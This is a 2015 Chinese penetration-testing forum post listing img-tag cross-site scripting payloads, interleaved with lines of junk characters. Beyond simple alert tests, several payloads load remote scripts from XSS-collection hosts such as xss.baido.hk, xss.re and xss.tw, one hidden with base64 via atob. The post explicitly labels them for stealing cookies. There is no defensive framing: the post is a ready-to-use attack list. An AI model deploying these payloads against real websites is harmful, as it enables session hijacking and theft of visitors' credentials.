中国网络渗透测试联盟
标题:
img标签的常用几种测试手段
[打印本页]
作者:
admin
时间:
2015-10-18 14:33
标题:
img标签的常用几种测试手段
<img src='non-exist.jpg'onerror="alert('xss')">
G! [- X0 Z {
<img src=# onerror=alert(123)>
! w8 b! }: J+ V: o' W/ @
<img src=# onerror=alert(document.cookie)>
F3 o" T9 w$ y
下面是利用平台钓cookie的
+ L# [: }0 H8 W% g+ z
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
) M7 R% w$ A- n* N. j$ e
+ [, v# F- X' B" t& H
: {/ z, Z6 n. T4 l, O
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
. m0 A& N" {( s. P: b% ~6 t o
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
2 b: f2 y' Q2 N6 E: T; H7 [5 |
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
7 J6 r J( j$ C2 h& C
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
/ b# S: t3 D; v
<img src="#">
/ ]. F+ m) w/ Z" M* ^' ?) H
<img src="#">
" L( D2 p6 B8 C, B: l4 ^" Y
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
, q1 N: M M8 d* S& |* f" E, t( ~
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
" z+ Z4 L$ J8 S2 _: _8 C# U
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
, {& J9 ?1 }- |6 v! U) o' ~
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
- q) W+ q6 E* P, w; k& B: r2 {
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
/ c3 I6 m' H$ l- O. D D" {: s" i
<img src=x width="0" height="0"></img>
9 r1 s4 ]9 S5 s7 Z
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
! o8 f! ^* ~7 j* x7 a. Z( W
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
: l& ?. g* l$ z/ k
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2